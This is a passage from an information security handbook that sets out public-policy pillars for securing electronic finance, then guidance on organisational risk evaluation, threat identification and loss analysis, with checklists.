the benefits provided by technology and leapfrogging.45 E-security touches the heart of the new economy; the E-finance is the use of electronic means to exchange potential benefits to global markets and the interna- information, transfer signs and representations of value, tional community are substantial. However, the process and execute transactions in a commercial environment. of building a global electronic economy merits deep E-finance comprises four primary channels: electronic discussion of emerging business and policy issues: funds transfers (EFTs), electronic data interchange how should we define and protect privacy?, what do (EDI), electronic benefits transfers (EBTs), trust and confidence mean in a digital environment?, and electronic trade confirmations (ETCs). how can one determine the appropriate level of security and how can one measure the return on the security Although e-finance offers developing market economies investment? an expanded opportunity for commerce, the capability poses a number of serious risks. All four channels of Due to the ever-changing nature of technology, this e-finance are susceptible to fraud, theft, embezzlement, Handbook does not treat all these issues nor does it pilfering, and extortion. Most of the commerce-related attempt to provide definitive answers. Rather, it offers crimes that take place over the Internet are not new-- a view of what has transpired to date, the gaps that fraud, theft, impersonation, and extortion demands have are opening in the electronic security area, and some plagued the financial services industry for years. However, 44This Chapter is drawn from a report produced by Thomas Glaessner, Tom Kellermann, and Valerie McNevin for The World Bank (2002) entitled: "Electronic Security: Risk Mitigation in Financial Transactions." 
See link at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications 45See a number of works by Glaessner, Kellermann, and McNevin including "Electronic Safety and Soundness: Securing Finance in a Digital Age, Public Policy Issues (October 2003). This Monograph is the culmination of efforts over the past three years and builds upon a series of papers. These include: "Electronic Security: Risk Mitigation in Financial Transactions" (May 2002, June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002). All papers are available at: www.worldbank1.org/finance Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 87 technological advance opens up new dimensions of depth, In addition to e-security, many vendors supply a scope, and timing. Technology creates the possibility for multitude of interlinking services to the e-finance crimes of great magnitude and complexity to be com- providers in various countries. These services include mitted quickly and anonymously. In the past, stealing hosting companies, Internet Service Providers (ISPs), 50,000 credit card numbers would have taken months, and providers of financial services. Telecommunication perhaps years, for highly organized criminals. Today one companies in emerging markets are often the key criminal using software tools freely available on the providers of cellular, satellite, and microwave services Web can hack into a database and steal that number as well. Such companies may also supply hosting of identities in seconds. services and de facto money transmission services. In some cases, they may also provide certain electronic Recent surveys suggest that in the United States, 57% of security services. all hack attacks were initiated in the financial sector last year. Many breaches such as one incurred by the U.S. 
The cross-linking ownership of the e-security and Treasury result from a failure to implement appropriate e-finance industries raises complex questions of competi- risk-management processes or from the use of off-the- tion policy and potential conflicts of interest. In the case shelf commercial software without a layered approach to of competition policy, do the multiple roles played by security, involving personnel policies, communications telecom companies act to inhibit competition, guidelines, and regular updating of the technical means particularly in emerging markets where the technical deployed, such as virus scanners and firewalls. The results expertise to provide such services often resides in of well-publicized security breaches range from financial these companies? What about assuring the integrity P and reputation loss to a potential backlash against elec- of the services provided and company policies on report- ART tronic transactions stemming from mass consumer dis- ing security breaches promptly and accurately? Moreover, trust of the e-finance and e-commerce media. outsourcing trends in this industry highlight the impor- tance of reviewing the extent of downstream liability THREE The network-mediated economy presents unparalleled involved with this complex set of vendors. Typically, opportunities for both the creation of wealth and the contracts between financial entities and their providers theft or destruction of it. In assessing its promises and use service-level percentages as a performance guarantee weighing these against potential pitfalls, policy and deci- on a sliding-cost scale, but they do not build in suffi- sion makers should educate themselves about the role cient remedies to address product performance from a that e-security plays in ensuring safe and reliable busi- security perspective. ness transactions via the Internet. 
The public interest case for regulation of electronic The electronic security industry is growing and security within the financial services industry must globalizing; it will present public policy challenges in be recognized. Important trade-offs exist between elec- the areas of competition policy, potential conflicts of tronic security and such areas as costs, quality interest, and certification. of service, technological innovation, and privacy. Formulation of regulation and policy needs to E-security companies and vendors generally fall into three take explicit account of these trade-offs. categories: access, use, and assessment. Today's industry includes companies that provide active content monitor- Traditionally, the telecommunications industry has been ing and data filtering, develop intrusion detection servic- regulated as being essential to public health, interest, es, place firewalls, conduct penetration tests to expose and welfare. Hence, a core component of its regulatory hardware or software vulnerabilities, offer encryption model was to expand service to give everyone access. software or services, and create authentication software In many countries, access to basic service is now or services that use passwords, tokens, keys, and biomet- considered a necessity of modern life. Historically, rics to verify the identity of the parties or the integrity the financial services industry has been regulated by of the data. the premise that trust and confidence are paramount to the orderly movement of trade, goods, and money. 88 INFORMATION SECURITY AND GOVERNMENT POLICIES And, given that a special trust is conferred on financial · Cyber crime entities, they must conduct their business in a safe, · Anti-money laundering sound, and prudent manner. 
Convergence of the · Enforcement infrastructure telecommunications industry and the financial services sector through the Internet heightens the importance Together, these six areas of policy, law and enforcement of and the necessity for sound public policy and should address the basic relationships among all informed regulation to ensure that government, participants and the transactional activity that flows business, and people continue to have access to through the payments system. A cornerstone of an secure financial services. e-finance legal framework is to recognize the legal validity of consumer electronic signatures, transactions, Efforts to develop public policy to improve or establish or records. The legal framework should prefer technology- electronic security measures should take into consideration neutral solutions, provide basic consumer protections for the following eight important pillars: electronically based transactional activity, promote interoperability, and address evidentiary issues. (i) An adequate legal and enforcement framework; (ii) Technical and managerial arrangements to ensure Electronic Transactions electronic security of payment systems; (iii) Robust supervision and prevention, to creates Electronic transactions law should define what is better incentives to implement appropriate meant by an electronic signature, record, or transaction, layered risk-management systems, including recognizing the legal validity of each element. The policy electronic security for financial services should be especially careful in defining an electronic providers; signature. Definitions should be technology-neutral to (iv) A framework within which private insurance the greatest degree possible, in order to allow various companies can insure against and monitor e-risk, technical solutions to enter the marketplace. 
thereby helping to improve standards in this area via the underwriting covenants they require; Payment Systems Security (v) Digital signatures; (vi) Information sharing; Development of policy for payment systems security (vii) Education of citizens, employees, should consider all entities that directly affect the sys- and management on security issues; and tem. All such entities should operate in a secure manner (viii) A layered security structure. so as to protect the integrity and reliability of the system. Further, policy could require timely and accurate report- Pillar I: Legal Framework and Enforcement ing on all electronic -related money losses or suspected losses and intrusions. And finally, policies could require Countries adopting electronic banking or electronic that the financial institution and related providers have delivery of other financial services (e.g., distribution sufficient risk protection. and trading of securities) must consider electronic security concerns as they develop their laws, policies Privacy and practices. They must promote the use of security to protect back-end and front-end electronic operations Privacy law should encompass data protection and use, and should reform their criminal laws to address cyber consumer protection and business requirements, and crime. notices about an entity's policy on information use. The European Union (EU) continues to be the leader in In the policy design process, an e-finance legal frame- providing privacy protection to its citizens with the 1995 work should take the following areas into accounts: EU Directive on Data Protection. At a minimum, the privacy law should embrace the fair information practice · Electronic transactions and electronic commerce principles, including notice, choice, access, minimum · Payment systems security information necessary to complete the transaction. 
· Privacy Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 89 Cyber Crime46 Definition of a Money Transmitter Every nation should have in place laws addressing A money transmitter is any commercial enterprise abuses of a computer or network that result in loss or engaged in the transfer and exchange of monetary destruction to the computer or network, as well as asso- instruments and currency. Often these non-depository ciated losses. The law should also provide the tools and entities are involved in the "money service business" resources needed to investigate, prosecute, and punish and serve as third-party automated clearinghouse perpetrators of cyber crimes. An example of such laws providers.47 In considering the security of the electronic and directives may be seen in the Council of Europe's payment system, regulators should recognize that a Convention on Cybercrime, discussed at length in Part 4 new paradigm for money movement has evolved in a of this Handbook. sophisticated IT environment. The significant amount of money that flows around banks instead of through Anti­Money Laundering them has a significant impact on the global payment system, monetary policy, and economic forecasting. These statutes should define money laundering and encourage international cooperation in the investiga- Reporting Requirements tion, prosecution, and punishment of such crimes, giving special attention to money laundering threats The failure to report security incidents, particularly in inherent in new or developing technologies. the financial services area, enables further engagement in unsafe and unsound activities and further losses to P Enforcement those who use such payment systems without check or ART prevention. One approach is to place an affirmative Perhaps as important as the legal framework will be duty on executives48 to report incidents. the need to enforce the provisions of e-security laws THREE within and across national boundaries. 
Many different types of computer intrusions originate through activities conducted in countries with weak legal and enforcement regimes for electronic security, making international cooperation essential.

Pillar II: Electronic Security of Payment Systems

Payment systems are a critical component of any financial system. Policies to mitigate risk to payment systems should address the following five problems:

1. The definition of money transmitters.
2. Reporting requirements.
3. Regulation.
4. Warranties, indemnification, and liabilities.
5. Security requirements for service providers.

Regulatory Initiatives

Regulators should consider how broadly to extend supervision and enforcement over transmission vehicles. The primary reason cited by most people for refusing to use electronic transmission vehicles is fear that the information is not adequately protected. Proper protection could strengthen consumer confidence and market discipline, paving the way for greater use of electronic financial systems.

Indemnifications and Warranties

Financial institutions could require warranties and indemnifications from businesses that create software and hardware or supply it to financial services providers. They also could require the companies that provide these products to be liable if losses occur as a result of software or hardware "holes." Entities providing services or products to the financial services industry could, perhaps, be held to a higher standard of care or required to explain up front that their product is not configured or otherwise appropriate for use in this sector. A variation on this solution is to require a disclaimer on hardware or software stating that it should not be used to create, move, or store confidential, privileged, or sensitive information and that if it is used for those purposes the manufacturer cannot be held liable.

46 The Council of Europe, Convention on Cybercrime, http://conventions.coe.int
47 These services may include money order issuance, wire transfers, currency exchange, and so on.
48 Particularly Chief Information Officers and Information Security Officers.

90 INFORMATION SECURITY AND GOVERNMENT POLICIES

Standards for Service Providers

Service providers to the financial services industry also could be held to a higher standard than those not interacting directly with that industry. Again, this effort would go a long way toward building trust and confidence.

Pillar III: Supervision and Prevention Challenges

In addition to monitoring the payments system and supervising money transmitters, there would be a benefit to revisiting the regulatory, supervisory, and preventive approaches to ensuring security for financial services providers. This is particularly true for businesses that engage in electronic banking or provide other online financial services.

Capital Requirements

The new Basel guidelines for capital, especially those dealing with operational risk, do not address the problem of measuring either the risk to reputation or the strategic risk associated with electronic security breaches. Hence, there is a question of how best to measure a bank's operational risks when the information about computer security incidents is not accurate and when defining reputation damage is difficult. Given the problems involved in measuring capital adequacy in cases of electronic security risk, one effective approach might be to use the examination process to identify and remedy electronic security breaches in coordination with better incentives for reporting such incidents.49 In addition, authorities could encourage or even require financial services providers to insure against some aspects of e-risks (e.g., denial of service, identity theft) that are not taken into account within the existing capital adequacy framework. As the private insurance industry becomes more active in this field, this approach may be feasible, subject to the overall soundness and health of the insurance industry and its structure in emerging markets.50

Downstream Liability

The legal or regulatory framework could create incentives for hosting companies, application service providers, and software, hardware, and e-security providers to be accountable to the financial services industry.

Supervision and Examination Processes

The Basel Committee on Banking Supervision's Electronic Banking Group (EBG) was formed to make recommendations for needed additions, changes, or improvements in supervision and examination to accommodate the new technologies. In 2001 the EBG released Risk Management Principles for E-Banking, which includes specific principles calling for proper authorization and authentication measures, and internal controls and comprehensive security of e-banking assets and information. The areas of supervision and examination will undergo major reorientations over the next few years. Just as the security industry experienced a paradigm shift with the mass introduction of and dependence on PCs and the Internet, so must bank supervision realize that the center of gravity in the financial services industry is changing.

Coordination of Agencies Within and Across Borders

One key issue facing most countries is the need to improve information exchange between regulatory and law enforcement agencies. Many countries have several agencies for gathering critical information, but often the data is not shared by these agencies or with the agencies of other nations (sometimes for legal reasons). The issue of information exchange between agencies in both domestic and international contexts is beyond the scope of this Handbook. However, as governments try to leverage scarce resources in order to regulate and battle crime in the electronic environment, information sharing and international cooperation are key issues.

49 See the discussion of Pillar VI in this executive summary.
50 In many emerging markets, the insurance industry itself may need to be restructured and be stable; however, cross-border provision of such coverage may be an option.

Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 91

Pillar IV: The Role of Private Insurance as a Complementary Monitoring System

Financial supervisory agencies are still developing regulatory standards. Due to the difficulties inherent in monitoring complex transactions taking place over rapidly changing technological infrastructures, it is important to seek complementary private solutions to monitor risks. The insurance industry already is playing a role in this area despite the defects present in the information that is used to price e-risk coverage. Over the next few years, in the United States market alone, the growth in e-commerce liability insurance and e-risk coverage may total as much as $2.5 billion annually.

Still in its early development, insurance related to e-commerce liability and e-risk has problems in first- and third-party coverage. The pricing of cyber-risk insurance is also in need of further development, but to accomplish this, the insurance industry needs a better base of information on security breaches and associated risks. Current underwriting practices for this form of insurance have paid insufficient attention to the special risks that wireless technologies bring to the delivery of financial services. Insurance providers could require that explicit electronic security standards for wireless technology be identified and used to mitigate these risks before they underwrite e-risk policies.

The global insurance industry can serve as an important force for change in electronic security requirements. First, it can strive to improve the minimum standards for electronic security in the financial services industry. The global insurance industry could advocate the use of enhanced layered electronic security as a business prerequisite, for example. Second, insurance companies could require that financial services entities use vendors that meet certified, industry-accepted standards to provide electronic security services as a way of mitigating their risks of underwriting coverage. Third, insurance companies could encourage regulators to require that financial services entities provide and improve the quality of data and information on incidents so they can conduct better actuarial analysis on e-risks and return on investment. Finally, the industry could promote solutions that require e-security vendors and other e-enabling companies (hosting, etc.) to engage in risk sharing and to bear appropriate liability for security breaches.

Pillar V: Certification, Standards, and the Roles of the Public and Private Sectors

Both public and private entities should work cooperatively to develop standards and to harmonize certification schemes. Two categories that require particular attention in terms of certification deal with electronic security service providers and transaction elements.

One possible approach in securing e-finance would be for financial regulators to require licensing of vendors that directly affect the payment system. Another approach would be to require the industry to certify vendors that provide electronic security services. Recently the security industry has developed a Security Expert certification. By using a certification approach, the industry benefits by providing consumers with a recognizable structure, accountability between the industry and its experts, and a means of separating the approved expert from the self-proclaimed expert. It also elevates the field of security to a professional status and creates an incentive for the industry to raise and protect standards.

A second area to consider is the certification of transaction elements such as electronic signatures. Certification can add value to a transaction, depending on who or what provides the certification and on the elements that are being certified. Certification may be offered by a governmental entity, such as a post office, or a private entity, such as a bank. Each of these scenarios presents unique structural and governance issues. In many countries private companies (financial services providers or non-financial companies) may be better equipped to provide the information infrastructure required to act as certification agents or to provide cross-certification.

The essential element of a successful certification scheme is that certification structures located in different jurisdictions must provide the same attributes to the transaction consistently and that a certifier's scope of authority and liability must remain uniform across jurisdictional borders.

Although the use of PKI technology and certification authorities is often touted as the only accepted means of ensuring security, it is necessary to consider the costs and the cumbersome structure associated with PKI, as well as the legal inconsistencies associated with certification authorities. The practical element is that the solution be applicable across borders in terms of scope and liability, no matter what technology is used to perform the function.

Pillar VI: Accuracy of Information on E-Security Incidents and Public-Private Sector Cooperation

The lack of accurate information on e-security incidents is the result of the lack of knowledge or motivation to capture the data, measure it, and share it. Electronic security would improve worldwide through the enhancement of national and cross-border arrangements to facilitate sharing by financial services providers of accurate information on denial-of-service intrusions, thefts, attempted fraud, and so on. Failure to share information not only limits awareness but, even more important, it can limit the development of private sector solutions (including insurance). This lack of information may even serve to increase the cost to companies and financial services providers of insuring against such risks.

Greater public-private sector cooperation is needed in this area. For example, BITS' Security and Risk Assessment Steering Committee is addressing security, safety, and soundness in existing and emerging payments, electronic commerce, and related technologies through the establishment of a Financial Services Security Lab. This Lab facilitates information exchange on security issues in the financial services industry. Furthermore, the Internet Security Alliance, the Forum of Incident and Response Security Teams (FIRST, with 56 worldwide offices), and the Computer Emergency Response Teams set up in various countries have shown that cooperation results in greater information sharing among law enforcement and private providers of financial services. A common element in all these programs is a reliance on confidentiality and trust; as a condition of receiving accurate information, the law enforcement and academic entities do not divulge the identity of respondents. In this area, the role of multilateral agencies to facilitate cooperation deserves examination. It is axiomatic that the more "connected" the economy becomes, the more important it is for each element to bear its portion of the burden. Today's financial services industry was founded as an integrated system. The technological changes of the past decade have expanded and heightened the interdependencies of that system.

Pillar VII: Education and Prevention of E-Security Incidents

Statistical analysis reveals that in many countries throughout the world, more than 50% of electronic security intrusions are carried out by insiders. An undereducated workforce is inherently more vulnerable to internal attack. By contrast, a well-educated workforce that is conscious of security issues can effectively add a layer of protection.

Educational initiatives could be targeted at financial services providers (both systems administrators and management), at various agencies involved in law enforcement and supervision, and at users of online financial services. Initiatives might include the following:

· improvement of awareness and education of financial sector participants about cyber ethics and appropriate user behavior on networked systems;
· creation of institution-wide e-security policies on appropriate behavior and the corresponding channels for reporting intrusions or incidents, in close coordination with any effort to improve worldwide information on intrusions;
· development of awareness in the banking community in emerging markets about the need for "incident response plans" in case an incident transpires;
· facilitation of cooperation and transfer of know-how among law enforcement entities, financial intelligence units (FIUs), and supervisory agencies in developed and emerging markets via such devices as more active exchange programs between personnel;
· design of focused courses for examiners under the auspices of the Financial Stability Institute or other training centers; and
· development of a cross-border university outreach program to promote the training of future e-security professionals, while also improving the education of users of online financial services.

Pillar VIII: Layered Security

Twelve core layers of proper security are a fundamental component for maintaining the integrity of data and mitigating the risks associated with open architecture environments. The twelve-linked chain defines what security should be online. The network is only as secure as its weakest link. Details on the twelve layers of security are provided at the end of Part 3.

Provisos

Parts 3 and 4 of this Handbook cover a rapidly evolving area using a cross-disciplinary approach, integrating the economy, law, and technology as appropriate. Because of its rapid growth, e-security is often wrapped in myth. Most countries, including those that have greater experience dealing with it, still know little, and emerging markets know even less. The Handbook focuses relatively more attention on lessons learned in the United States because it is considered the birthplace of the Internet and has had a longer time to experience its benefits and pitfalls, as well as to create early standards.51 Just as important, the Handbook looks at the experiences and efforts of certain advanced economies in Europe, as well as of countries in Asia and South America. Clearly, however, there is much to be said about a) the specific problems of emerging markets in this area, and b) the areas of legislation and institutional arrangements that are required to improve electronic security worldwide. Without such efforts, the great potential offered by adopting electronic finance and commerce can be significantly compromised, because the trust and confidence of market participants will be detrimentally affected.

The chapters to follow will offer: a) methodologies of risk evaluation and loss analysis; b) practical guidance on developing security policies and procedures that are appropriate for your organization; c) general and specific advice for managers and employees on best practices in e-security; and d) a series of checklists, with an array of comments from around the world on the topic of security in business operations, particularly with regard to the financial sector and e-commerce applications.

51 Historically, the Internet was derived from ARPANET, which was designed in 1969 by the Advanced Research Projects Agency, Department of Defense.

CHAPTER 3. RISK EVALUATION AND LOSS ANALYSIS

At A Glance

This chapter covers security risk evaluation and loss analysis in a business context. We consider a range of security threats, their potential origin and action, and consider the severity of their effects on our day-to-day operations. We outline the cornerstones of a sound security policy and explain the basic principles of loss analysis, should a real security incident take place.

Technology Development: New Frontiers

All businesses, whether they are large or small, are operating in an increasingly global environment. Advances in communications and transportation networks in the last century have brought customers and markets closer together and it is now possible, at relatively minimal cost, to ship products to buyers in all corners of the world. In this international context, executives and managers must consider the range of threats to their enterprises. Since the late 1990s, there has been an increase in violent attacks all over the world, including the World Trade Center attack in 2001. In response, there has been a heightened awareness of physical security needs: the need to police the space around buildings, to control access to buildings, to design sound policies for evacuation in the event of a disaster, and to develop stronger points of contact with the local and federal authorities.

On the technological front, there is a corresponding need to survey the threats to computing equipment (hardware), the applications and databases that reside on that equipment (software), and the networks that connect groups, both internally and with the outside world. In a business environment, raw data such as customer records or credit card information are valuable to competitors and computer criminals and require special attention. In addition, for more advanced enterprises, intellectual property including scientific research or unique business processes has high value and also requires special security measures. As the world becomes an increasingly competitive place, the theft of both raw data and intellectual property assets via computer is on the rise. A combination of preventive maintenance supported in attitude and investment by the executive team, employee training and vigilance, and clear communications throughout the organization will help reduce the threats of physical and cyber-security breaches.

Knowing Ourselves

Although there are common themes and procedures for securing buildings and computer systems, it is important to have a complete picture of what the organization is and what it does in order to develop an appropriate, cost-effective security plan. A company that handles hazardous waste or biological materials will require a different set of policies and procedures than one that produces electronic devices. As the management begins the process of identifying potential security risks, it will be helpful to answer the following five questions:

1. What is the main product or service offered by the organization? If there are multiple answers, try to prioritize the elements of each answer.
2. What are the main sources of revenue and growth for the organization?
3. How is the organization structured: what are the different departments and what are their main functions? How do these units operate, communicate, and fit together as a whole?
4. What information assets are the most critical to each department and what types of technology does the organization use to store and disseminate this information internally and externally (when applicable)?
5. Who are the customers, partners, and vendors for the organization and how do they interact?

The information needed to answer these questions will be found through conversations with employees (especially the IT staff), managers, and executives of the company. It will be useful to evaluate customer and supplier feedback on other issues as this may lead to revelations on security issues. Finally, the team gathering the information should be familiar with media reports about the company. Public perceptions may also be instructive, especially if the company is involved in a controversial industry, is located near a hot spot of activity, or has appeared in prominent publications on a regular basis.

Knowing the Enemy: Internal and External Threats

Once the company has assessed its structure and functions, it will be in a better position to develop a profile of its potential strengths and weaknesses in the area of security. Initially, it should focus on general threats present to any organization. Once these threats are understood, an evaluation of the level of internal and external threats posed to its operations will be possible.

General threats to any company or formal organization include:

Physical threats:
· Disasters (fire, earthquake, major storms, flooding)
· Theft
· Vandalism
· Physical interference with or destruction of networks
· Corporate spying

Software threats:
· Penetration of firewalls
· Malicious code (viruses, Trojans, logic bombs, worms)
· Unauthorized dissemination or destruction of data
· Corporate spying via digital means

Of the threats that are posed by human actions, the company should assess both internal and external perpetrators. In some cases, internal security breaches may stem from human error: simple ignorance, inattention, or inadequate training on the part of employees. In other areas, especially corporate spying, social engineering may be used to gain access to facilities, confidential business data, or knowledgeable individuals within a firm. An appropriate set of policies established by the security department, in conjunction with the personnel department, may help to alleviate such threats; Security and Personnel may also work together on employee hiring and termination procedures.

The motivations behind malicious computer activities are varied and deserve some explanation, though in some cases a clear motive is very hard to define. It is tempting, though misleading, to stereotype the types of people who hack computers. However, there are some general comments to be made on the severity of the threat and the forms of damage that come from each paradigm.

Casual, or "summertime," hackers are employees of an organization with some familiarity with network protocols. They are typically not intent on damaging data or company property; they are merely curious and tempted by the challenge of attempting to access resources that they are not authorized to use. However, they may not fully understand the hacking tools they are using and may damage systems through improper use. Further, if they have downloaded tools from the Internet, they may be downloading programs that contain backdoors and Trojan horses for other attackers to use. This is a serious threat and is one reason why casual hacking should be forbidden in an enterprise.

Script kiddies are generally younger hackers (high school or college age) with reasonably good computer skills and too much time on their hands. On the whole, they are not focused on doing serious damage in the way that a targeting criminal is, but they are numerous and sometimes work in teams, posing a greater threat than they might as individuals. One of the tricky issues with script kiddies is that a successful hack, well publicized, will be a claim to fame; they are lured by the potential notoriety conferred by high profile intrusions and pranks. Due to the prevalence of this threat, security software makers have developed fairly effective tools against this form of hacking; firewalls and Intrusion Detection Systems (IDSs) are optimized for defending against young attackers.

Targeting criminals are focused, often skillful attackers with clear intent to steal information, corrupt or destroy data, and render systems useless for extended periods of time. Unlike casual hackers and script kiddies, targeting criminals generally have an incentive to hack systems. In some cases, they are looking for valuable information such as financial data (credit card numbers, bank account details) or personal data that may be manipulated or exploited in some way (identification numbers, academic records, customer files). This type of attacker is often well organized and will perform several intrusions to gather information prior to an actual attack. Fortunately the targeting criminal is less prevalent than other types of attackers. However, he or she is more difficult to contain and is more likely to do serious damage once a penetration has occurred.

Employees and consultants may become deliberate or accidental security threats depending on the nature of their relationship with their managers and peers in the workplace. Due to their level of access inside the organization they are a serious concern from a security standpoint. Like the casual hacker, some may work from boredom or the attraction of a technical challenge. Some may be seeking information related to promotions, salaries of colleagues, or business data. Others may be disgruntled employees seeking to inflict pain on the organization by whatever means necessary, and others may be accidental threats, leaving systems unprotected through insufficient technical training or carelessness.

Each of these potential human threats to systems and information security poses a different level of danger and requires a different method of containment. Up-to-date firewalls and IDSs may be adequate to keep out casual attackers or script kiddies. Vigilant systems administrators and managers will be needed to detect and stop targeting criminals; personnel policies and management attention will help in thwarting potential attackers inside the organization. However, no plan is completely foolproof and it is important for the organization to study its history and trends with regard to security breaches; continued surveillance of the security landscape will make the tasks of detection and prevention easier. In addition, clearly articulated policies on what should happen during and after an attack will help cushion the impact of an intrusion and guide the personnel responsible for attending to the damage and filing the appropriate reports with internal and external authorities when necessary.

Practical Security Assessment: Risk Evaluation and Loss Analysis

As we have seen, security breaches may stem from internal or external attacks and result in unauthorized access to systems and data that may or may not be used for unethical or illegal purposes. The first steps in forming a security policy are taken when the organization conducts a security assessment covering its internal processes, objectives, and current vulnerabilities. Once these elements have been analyzed, a security policy and procedures plan may be developed.

This plan should include information on these key areas:

· Knowing when you are under attack – through the deployment of Intrusion Detection Systems (IDSs) and internal vigilance.
· Preparing for the worst-case scenario – think about spill-over effects for each form of security breach.
· Developing a written policy to deal with break-ins – plan to write up security incidents; a written record will help analyze individual events and assist in preventing successful attacks in the future.
· Hiring an expert if you need one – this may be on an incident-related basis, or a regular consulting arrangement. Beware of hiring self-proclaimed hackers. Security outsourcing will be covered later in this section.52
· Providing the necessary training to technical staff and other employees – many security breaches are caused or aided by insufficient knowledge of proper procedures regarding security issues. Everyone in the company should know how to implement security-related procedures.
· Designating a point of contact – this person should have expertise in the area of IT security and may answer directly to members of the management team.
· Understanding and prioritizing your goals – these will include some or all of the following:
  o Protect customer information
  o Contain the attack
  o Notify senior management
  o Document the event
  o Take a snapshot of the system
  o Contact a Computer Security Incident Response Team
  o Identify the intruder
  o Know who is responsible for what
  o Know whom you can trust

52 This recommendation would be most applicable to medium sized or large enterprises. It would also apply to companies that are heavily dependent on technology for their operations and/or focused on the high tech market. In the latter case, potential customers may form some opinions about the company based on its technical appearance and smoothness of operation.

If an incident does occur, you should reexamine your existing policies and procedures and tighten them up when logistically and financially possible. As with the organization evaluation, asking a series of questions will help to define the strengths and weaknesses in a security policy plan. A sample checklist focused on the ability to respond effectively to a break-in would include:

Incident procedures, recovery plans, and funding:
o Do incident response procedures exist?
o Are procedures understandable and up-to-date?
o Are disaster recovery plans in place?
o Has adequate funding been allotted for developing and maintaining incident responses to break-ins?

Procedures, security experts, and management:
o Do the procedures include instructions for contacting a security expert 24 hours a day, 7 days a week?
o If the security expert does not respond, does a procedure exist for escalating the problem to management?
o Do procedures include notifying the Chief Information Officer (when applicable) immediately when any break-in occurs, and again when the break-in is resolved?
o Is there a procedure for determining when to contact outside help, and whom to contact?

Procedures and personnel:
o Have all key personnel been trained in using the procedures?
o Have key personnel actually attended all required training sessions?
o Have appropriate background checks been conducted on key personnel?
o Are communications between and among the system administration and security groups flowing smoothly?

Procedures and technical resources:
o Are system logs enabled?
o Are system logs periodically reviewed?
o Are the tools needed to detect an intrusion installed and operational?
o Can the detection software installed on your network detect unknown attacks?
o Can you detect and prevent attacks on the network and the host, constituting a layered approach to detection?
o Are attacks easy to trace back on your network?
o Do all systems have adequate security controls as proven by formal audit results?

Steps in Risk Evaluation

The first step in improving the security of your system is to answer these basic questions:

· What am I trying to protect and how much is it worth to me?
· What do I need to protect against?
· How much time, effort, and money am I willing to expend to obtain adequate protection?

These questions form the basis of the process known as risk assessment. Risk assessment is a very important part of the computer security process. You cannot formulate protections if you do not know what you are protecting and what you are protecting those things against! After you know your risks, you can then plan the policies and techniques that you need to implement to reduce those risks. For example, if there is a risk of a power failure and if availability of your equipment is important to you, you can reduce this risk by installing an uninterruptible power supply (UPS).

Risk assessment involves three key steps:

1. Identifying assets and their value
2. Identifying threats
3. Calculating risks

There are many ways to go about this process. One method with which we have had great success is a series of in-house workshops. Invite a broad cross-section of knowledgeable users, managers, and executives from throughout your organization. Over the course of a series of meetings, compose your lists of assets and threats. Not only does this process help to build a more complete set of lists, it also helps to increase awareness of security in everyone who attends.

An actuarial approach is more complex than necessary for protecting a home computer system or a very small company. Likewise, the procedures that we present here are insufficient for a large company, a government agency, or a major university. In cases such as these, many companies turn to outside consulting firms with expertise in risk assessment, some of which use specialized software to do assessments.

Identifying Assets

Draw up a list of items you need to protect. This list should be based on your business plan and common sense. The process may require knowledge of applicable law, a complete understanding of your facilities, and knowledge of your insurance coverage. Items to protect include tangibles (disk drives, monitors, network cables, backup media, manuals) and intangibles (ability to continue processing, your customer list, public image, reputation in your industry, access to your computer, your system's root password). The list should include everything that you consider of value. To determine if something is valuable, consider what the loss or damage of the item might be in terms of lost revenue, lost time, or the cost of repair or replacement.

Some of the items that should probably be in your asset list include:

Tangibles:
· Computers
· Proprietary data
· Backups and archives
· Manuals, guides, books
· Printouts
· Commercial software distribution media
· Communications equipment and wiring
· Personnel records
· Audit records

Intangibles:
· Safety and health of personnel
· Privacy of users
· Personnel passwords
· Public image and reputation
· Customer/client goodwill
· Processing availability
· Configuration information

You should take a larger view of these and related items rather than simply considering the computer aspects. If you are concerned about someone reading your internal financial reports, you should be concerned regardless of whether they read them from a discarded printout or snoop on your e-mail.

Identifying Threats

The next step is to determine a list of threats to your assets. Some of these threats will be environmental, and include fire, earthquake, explosion, and flood. They should also include very rare but possible events such as building structural failure, or discovery of asbestos in your computer room that requires you to vacate the building for a prolonged time. Other threats come from personnel, and from outsiders. We list some examples here:

· Illness of key people
· Simultaneous illness of many personnel (e.g., flu epidemic)
· Loss (resignation/termination/death) of key personnel
· Loss of phone/network services
· Loss of utilities (phone, water, electricity) for a short time
· Loss of utilities (phone, water, electricity) for a prolonged time
· Lightning strike
· Flood
· Theft of disks or tapes
· Theft of key person's laptop computer
· Theft of key person's home computer
· Introduction of a virus
· Bankruptcy of a key vendor or service provider
· Hardware failure
· Bugs in software
· Subverted employees
· Subverted third-party personnel (e.g., vendor maintenance)
· Labor unrest
· Political terrorism
· Random "attackers" getting into your machines
· Users posting inflammatory or proprietary information on the Web
· Commercial (corporate) spies

Review Your Risks

Risk assessment should not be done only once and then forgotten. Instead, you should update your assessment periodically, at least once a year, and any time there is a major change in personnel, systems, or the operating environment.53 In addition, the threat assessment portion should be redone whenever you have a significant change in operation or structure. Thus, if you reorganize, move to a new building, switch vendors, or undergo other major changes, you should reassess the threats and potential losses.

Loss Analysis

Determining the cost of losses can be very difficult.

your cost calculation will increase your effort, but will also increase the accuracy of your calculations.

For most purposes, you do not need to assign an exact value to each possible risk. Normally, assigning a cost range to each item is sufficient. Some items may actually fall into the category irreparable or irreplaceable; these could include loss of your entire accounts-due database, or the death of a key employee. You may want to assign these costs based on a finer scale of loss than simply "lost/not lost." For instance, you might want to assign separate costs for each of the following categories:

· Non-availability over a short term (< 7–10 days)
· Non-availability over a medium term (1–2 weeks)
· Non-availability over a long term (more than 2 weeks)
· Permanent loss or destruction
· Accidental partial loss or damage
· Deliberate partial loss or damage
· Unauthorized disclosure within the organization
· Unauthorized disclosure to some outsiders
· Unauthorized full disclosure to outsiders, competitors, and the press
· Replacement or recovery cost

The Probability of a Loss

After you have identified the threats, you need to estimate the likelihood of each occurring. These threats may be easiest to estimate on a year-by-year basis. Quantifying the threat of a risk is hard work. You can obtain some estimates from third parties, such as insurance companies. If the event happens on a regular basis, you can estimate it based on your records. Industry organizations may have collected statistics or published reports. You can also base your estimates
